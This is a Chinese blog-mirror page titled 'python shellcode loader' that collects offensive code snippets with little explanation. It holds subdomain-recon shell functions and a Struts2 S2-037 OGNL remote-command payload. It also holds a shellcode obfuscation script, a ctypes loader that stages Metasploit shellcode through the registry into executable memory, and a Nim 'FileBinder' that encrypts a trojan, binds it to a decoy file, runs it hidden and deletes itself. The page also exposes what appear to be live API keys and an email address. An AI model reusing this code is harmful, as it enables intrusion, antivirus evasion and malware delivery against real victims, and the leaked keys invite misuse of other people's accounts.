zoukankan      html  css  js  c++  java
  • python shellcode加载器

    Recon() {
    ./assetfinder --subs-only  $1 > $1-assetfinder.txt;./ksubdomain -d $1 -silent -skip-wild -full -o $1-ksubdomain.txt;./subfinder -d $1 -all -silent > $1-subfinder.txt;./findomain -t $1 -q > $1-findomain.txt;./amass enum -passive -norecursive -noalts -d $1 -o $1-amass.txt;cat *.txt | sort | uniq > $1-basic;rm -rf *.txt
    }
    Mass() {
    cp $1-basic ../subdomain2;cd ../subdomain2;altdns -i $1-basic -w words.dic -o $1-altdns.txt;cat $1-altdns.txt | ./massdns/bin/massdns -r ./massdns/lists/resolvers.txt  -t A  -o S -w $1_A_CNAME.txt;cat $1_A_CNAME.txt | sed 's/A.*//;  s/..$//;  s/CN.*//' > $1-massdns.txt;cat $1-basic $1-massdns.txt | sort | uniq > $1-all;rm -rf *.txt
    }
    

    3B822693-993e-1dac2-632e-b97337be0e4

    docker pull medicean/vulapps:s_struts2_s2-037
    docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-037
    http://ip:80/orders/3/
    (%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=16456&command=id
    
    
    import random
    import sys
    
    string = '0123456789abcdef'
    str_list = list(string)
    random.shuffle(str_list)
    string2 = ''.join(str_list)
    
    a = open(sys.argv[1],'rb')
    b = a.read().encode('hex')
    list = []
    for i in b:
        b = string2.find(i)
        list.append(b)
    
    
    f = open('Offset_shellcode.py','w')
    f.write("string = '{}'
    ".format(string2))
    f.write("list = {}
    ".format(list))
    f.write("buf = ''
    for i in list:
    	buf+=string[i]
    shellcode=bytearray(buf.decode('hex'))
    ")
    

    补丁网盘链接:
    链接: https://pan.baidu.com/s/1vo_teu41pA-v9OYfC9wprQ 密码: ndao

    # 模块API配置
    # Censys可以免费注册获取API:https://censys.io/api
    censys_api_id = '27006dda-b551-40cc-a592-a2577847c764'
    censys_api_secret = 'vXob9EOio9V7w2jTtBrZdI1iyYNzblCJ'
    
    # Binaryedge可以免费注册获取API:https://app.binaryedge.io/account/api
    # 免费的API有效期只有1个月,到期之后可以再次生成,每月可以查询250次。
    binaryedge_api = ''
    
    # Chinaz可以免费注册获取API:http://api.chinaz.com/ApiDetails/Alexa
    chinaz_api = 'df69b6ddcb634105b2d6599151d5b02b'
    
    # Bing可以免费注册获取API:https://azure.microsoft.com/zh-cn/services/
    # cognitive-services/bing-web-search-api/#web-json
    bing_api_id = ''
    bing_api_key = ''
    
    # SecurityTrails可以免费注册获取API:https://securitytrails.com/corp/api
    securitytrails_api = ''
    
    # https://fofa.so/api
    fofa_api_email = 'm13724810865_2@163.com'  # fofa用户邮箱
    fofa_api_key = '1f8566b6d6c1e86d9622b14da3ee8d5d'  # fofa用户key
    
    # Google可以免费注册获取API:
    # 免费的API只能查询前100条结果
    # https://developers.google.com/custom-search/v1/overview#search_engine_id
    # 创建自定义搜索引擎后需要在响应的控制面板上启用Search the entire web
    google_api_id = ''  # Google API自定义搜索引擎id
    # https://developers.google.com/custom-search/v1/overview#api_key
    google_api_key = ''  # Google API自定义搜索key
    
    # https://api.passivetotal.org/api/docs/
    riskiq_api_username = ''
    riskiq_api_key = ''
    
    # Shodan可以免费注册获取API: https://account.shodan.io/register
    # 免费的API限速1秒查询1次
    shodan_api_key = 'CID5rmCYAFd391vHGcLlALXUBjAIOU4V'
    # ThreatBook API 查询子域名需要收费 https://x.threatbook.cn/nodev4/vb4/myAPI
    threatbook_api_key = ''
    
    # VirusTotal可以免费注册获取API: https://developers.virustotal.com/reference
    virustotal_api_key = ''
    
    # https://www.zoomeye.org/doc?channel=api
    zoomeye_api_usermail = ''
    zoomeye_api_password = ''
    
    # Spyse可以免费注册获取API: https://spyse.com/
    spyse_api_token = ''
    
    # https://www.circl.lu/services/passive-dns/
    circl_api_username = ''
    circl_api_password = ''
    
    # https://www.dnsdb.info/
    dnsdb_api_key = ''
    
    # ipv4info可以免费注册获取API: http://ipv4info.com/tools/api/
    # 免费的API有效期只有2天,到期之后可以再次生成,每天可以查询50次。
    ipv4info_api_key = ''
    
    # https://github.com/360netlab/flint
    # passivedns_api_addr默认空使用http://api.passivedns.cn
    # passivedns_api_token可为空
    passivedns_api_addr = ''
    passivedns_api_token = ''
    
    # Github Token可以访问https://github.com/settings/tokens生成,user为Github用户名
    # 用于子域接管和子域收集
    github_api_user = ''
    github_api_token = ''
    
    # obtain Cloudflare API key from https://dash.cloudflare.com/profile/api-tokens
    cloudflare_api_token = ''
    
    

    默认是x64位的msf

    from ctypes import *
    from ctypes import wintypes
    import ctypes
    buf =  b""
    buf += b"x56xffxd5"
    
    ctypes.windll.Advapi32.RegSetValueExA(-2147483647, "test", None, 3, buf,len(buf))
    LPBYTE = POINTER(c_byte)
    ctypes.windll.kernel32.VirtualAlloc.restype = LPBYTE
    ptr = ctypes.windll.kernel32.VirtualAlloc(0,800,0x3000,0x40)
    data_len = wintypes.DWORD()
    ctypes.windll.Advapi32.RegQueryValueExA(-2147483647, "test", 0, 0, 0, byref(data_len))
    ctypes.windll.Advapi32.RegQueryValueExA(-2147483647,"test",0,None,ptr,byref(data_len))
    ctypes.windll.Advapi32.RegDeleteValueA(-2147483647, "test")
    handle = ctypes.windll.kernel32.CreateThread(0, 0, ptr, 0, 0, 0)
    ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
    
    #author @evilash
    
    import os
    import base64
    import strfmt
    import osproc
    import nimcrypto
    import nimcrypto/sysrand
    
    let help = """
    
      +-+-+-+-+-+-+-+-+-+-+-+-+-+
      |N i m F i l e B i n d e r|
      +-+-+-+-+-+-+-+-+-+-+-+-+-+ 
      @evilash
    
      It's a FileBinder writen by Nim
      And just a *rough* tool of learning Nim
    
      Usage:
        ./NimFileBinder <evil> <NormalFile> <key>
          -h,--help  : help
    """
    
    func toByteSeq*(str: string): seq[byte] {.inline.} =
      ## Converts a string to the corresponding byte sequence.
      @(str.toOpenArrayByte(0, str.high))
    
    proc EncryptFile(File1, File2, key: string): void = 
      var
       Content1 = readFile(File1)
       Content2 = readFile(File2)
       EnContent1 = encode(Content1)
       EnContent2 = encode(Content2)
    
      var
        data: seq[byte] = toByteSeq(decode(EnContent1))
        envkey: string = key
    
        ectx, dctx: CTR[aes256]
        key: array[aes256.sizeKey, byte]
        iv: array[aes256.sizeBlock, byte]
        plaintext = newSeq[byte](len(data))
        enctext = newSeq[byte](len(data))
        b64iv: string
    
    
    
      # Create Random IV
      discard randomBytes(addr iv[0], 16)
      # We do not need to pad data, `CTR` mode works byte by byte.
      copyMem(addr plaintext[0], addr data[0], len(data))
    
      # Expand key to 32 bytes using SHA256 as the KDF
      var expandedkey = sha256.digest(envkey)
      copyMem(addr key[0], addr expandedkey.data[0], len(expandedkey.data))
    
      ectx.init(key, iv)
      ectx.encrypt(plaintext, enctext)
      ectx.clear()
    
      b64iv = encode(iv)
    
      var B64EnCryContent: string = encode(enctext)
    
      var BinderTemplete: string = """
    
    import base64
    import winim
    import encodings
    import nimcrypto
    import nimcrypto/sysrand
    import os
    
    func toByteSeq*(str: string): seq[byte] {} =
      ## Converts a string to the corresponding byte sequence.
      @(str.toOpenArrayByte(0, str.high))
    
    var evilbase64 = "{}"
    
    var data2: seq[byte] = toByteSeq(decode(evilbase64))
    
    var BindFilebase64 = "{}"
    
    var deb64iv = decode("{}")
    var 
        envkey: string = "{}"
        dctx: CTR[aes256]
        key: array[aes256.sizeKey, byte]
        iv: array[aes256.sizeBlock, byte]
        crypttext = newSeq[byte]({})
        dectext = newSeq[byte]({})
    
    copyMem(addr crypttext[0], addr data2[0], len(data2))
    
    var expandedkey = sha256.digest(envkey)
    copyMem(addr key[0], addr expandedkey.data[0], len(expandedkey.data))
    copyMem(addr iv[0], addr deb64iv[0], aes256.sizeBlock)
    
    dctx.init(key, iv)
    dctx.decrypt(crypttext, dectext)
    dctx.clear()
    
    let decoded_Bindfile = decode(BindFilebase64)
    
    var evilname: string = "{}"
    var Bindfilename: string = "{}"
    
    writeFile(Bindfilename, decoded_Bindfile)   
    
    var utf8evilname =convert(evilname,"GB2312","UTF-8")
    var utf8Bindfilename =convert(Bindfilename,"GB2312","UTF-8")
    
    WinExec("cmd /k start " & utf8Bindfilename, SW_HIDE); 
    writeFile(r"C:\Windows\Temp\" & utf8evilname, dectext) 
    
    #writeFile(r"C:\Windows\Temp\calc.txt" , dectext) 
    
    #copyFile("C:\Windows\Temp\calc.txt", "C:\Windows\Temp\calc.exe")
    #removeFile("C:\Windows\Temp\calc.txt")
    
    WinExec("cmd /c C:\Windows\Temp\" & utf8evilname, SW_HIDE); 
    #WinExec("cmd /c C:\Windows\Temp\calc.exe", SW_HIDE); 
    
    ShellExecute(0, "open", "cmd.exe", "/c del " & paramStr(0), NULL, SW_HIDE)
    
    #WinExec("cmd.exe /c del temp.exe", SW_HIDE)
    
    """.fmt("{.inline.}", B64EnCryContent, EnContent2, b64iv, envkey, len(data), len(data), File1, File2)
    
      writeFile(r"outfile.nim", BinderTemplete)
    
    
    proc CompileFile(): void = 
      let errC = execCmd("nim c --cpu:amd64 -d:mingw --app:gui -d:danger -d:strip --opt:size --passc=-flto --passl=-flto {}".fmt("outfile.nim"))
      var rmhandle = tryRemoveFile("outfile.nim")
    
    
    proc main() =
      if paramCount() == 3:
        var
          TraojanFile: string = paramStr(1)
          NormalFile: string = paramStr(2)
          Enkey: string = paramStr(3)
    
        EncryptFile(TraojanFile, NormalFile, Enkey)
        CompileFile()
        return
    
      if paramCount() == 1 and (paramStr(1) == "-h" or paramStr(1) == "--help"):
        echo help
        return
      
      if paramCount() == 0:
        echo help
        return
    
      else:
        echo "  Expect two arguments
      ex: ./NimFileBinder <evil> <NormalFile> <key>"
        return
        
    
    main()
    
  • 相关阅读:
    UNDO表空间损坏导致数据库无法OPEN
    kettle新手教程
    Android ViewStub的使用方法
    【转】如何在ubuntu12.04设置adb驱动
    【转】ubuntu设置PATH----不错
    【转】Git与Repo入门----不错
    【转】Gedit中文乱码
    【转】 Git 常用命令详解(二)----不错
    【转】Android源码下载过程的一些注意事项
    【转】repo sync同步Android 源代码下载到99%出错
  • 原文地址:https://www.cnblogs.com/xcymn/p/15336365.html
Copyright © 2011-2022 走看看